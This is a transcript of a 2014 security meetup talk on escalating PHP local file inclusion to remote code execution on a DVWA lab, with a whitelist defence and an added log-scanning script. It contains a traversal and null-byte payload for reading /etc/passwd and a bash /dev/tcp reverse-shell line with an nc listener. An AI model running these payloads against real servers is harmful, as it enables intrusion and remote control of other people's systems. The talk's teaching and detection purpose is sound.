Local File Inclusion to Remote Code Execution
 


null Bangalore Chapter - March 2014 Meet

    Presentation Transcript

    • Local File Inclusion To Remote Command Execution [LFI <> RCE] By Sharath Unni
    • Introduction
        • What is a file inclusion vulnerability?
        • How does the attack work?
        • RFI/LFI vulnerable PHP functions
        • Traverse and read local files
        • Path traversal / FI using scanners
        • Reverse shell via LFI
        • Other ways to inject your code
        • Defending yourself
    • What is a file inclusion vulnerability?
        • Input validation
            • The application trusts the user input and does not validate it
        • The code includes/imports other pages
            • Pages are included dynamically
        • When PHP includes a file, it parses any PHP code within that file (between "<?php" and "?>")
        Do not trust the user... ever!
    • How does the attack work?
        http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include
        The code would be:
            <?php
            $file = $_GET['page'];
            include("/" . $file . ".php"); // <-- Vulnerable !!
            ?>
        • Assign page to "../../../../etc/passwd%00"
            <?php
            $file = $_GET['page'];
            include("/../../../../etc/passwd%00.php"); // <-- Directory Traversal to LFI
            ?>
        • %00 (null character) terminates the string, so everything that comes after %00 is ignored
        • ../../../ traverses the path up to the root and then goes to /etc/passwd
    • RFI/LFI vulnerable PHP functions
        • include()
        • include_once()
        • require()
        • require_once()
        • fopen()
    • Common locations
        • Normally, the following files are read:
            /etc/passwd
            /etc/group
            /etc/security/passwd
            /etc/security/user
            /etc/security/environ
            /etc/httpd/conf/httpd.conf
        • Other common Unix locations
    • Path Traversal / FI using scanners
        http://sectooladdict.blogspot.in/
        OR
        http://sectoolmarket.com/
    • We read the files, what next?
    • Reverse shell via LFI
        • PHP script to open an outbound TCP connection
            <?php exec("bash -i >& /dev/tcp/<yourIP>/<port> 0>&1"); ?>
        • Go and catch the reverse shell
            nc -lp <port>
    • Other ways to inject your code
        • Using directory traversal to read files
        • Log poisoning (access.log, error.log)
        • Session variables
        • Uploaded files
        • Emails
        • Shared hosting
        • FTP and other logs
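    • Defending yourself
        <?php
        // Whitelist: map each allowed page name to the file it may include.
        $page_files = array(
            'about'   => 'about.html',
            'photos'  => 'photos.html',
            'contact' => 'contact.html',
            'home'    => 'home.html'
        );

        // Fall back to 'home' when the parameter is missing or is not a string.
        $page = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : 'home';

        // Strict comparison: only an exact, known key selects a file.
        if (in_array($page, array_keys($page_files), true)) {
            include $page_files[$page];
        } else {
            include $page_files['home'];
        }
        ?>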
    • Thank You!
    • References
        • http://sectoolmarket.com/path-traversal-local-file-inclusion-detection-accuracy-of-open-source-web-application-scanners.html
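
Added example (not part of the original slides): a log triage script for the traversal, null-byte and log-poisoning slides above. It flags requests whose decoded target contains `../`, `%00` or one of the listed `/etc` files, and any log line carrying a PHP open tag. The combined log format, the rule names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache/nginx combined log format (assumed): capture host, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')

# Checks on the decoded request target, taken from the patterns on the slides.
TARGET_RULES = {
    "null-byte": re.compile(r"\x00"),
    "path-traversal": re.compile(r"(?:^|[/\\=])\.\.(?:[/\\]|$)"),
    "sensitive-file": re.compile(r"/etc/(?:passwd|group|security/|httpd/conf/)"),
}
# A PHP open tag anywhere in a log line means the log itself is unsafe to include.
PHP_TAG = re.compile(r"<\?php", re.IGNORECASE)

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return {'host', 'status', 'hits'} for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a parseable access-log line
    host, target, status = m.groups()
    target = decode(target)
    hits = [name for name, rx in TARGET_RULES.items() if rx.search(target)]
    if PHP_TAG.search(decode(line)):
        hits.append("php-tag-in-log")
    return {"host": host, "status": int(status), "hits": hits} if hits else None

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Mar/2014:10:00:01 +0530] "GET /dvwa/vulnerabilities/fi/?page=include HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Mar/2014:10:00:09 +0530] "GET /dvwa/vulnerabilities/fi/?page=../../../../etc/passwd%00 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Mar/2014:10:00:12 +0530] "GET /dvwa/vulnerabilities/fi/?page=%252e%252e%252f%252e%252e%252fetc%252fgroup HTTP/1.1" 404 310 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Mar/2014:10:01:30 +0530] "GET / HTTP/1.1" 200 512 "-" "<?php ?>"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        finding = scan_line(entry)
        if finding:
            print(finding)
```

A hit with status 200 deserves attention first, since the server returned content for the flagged request.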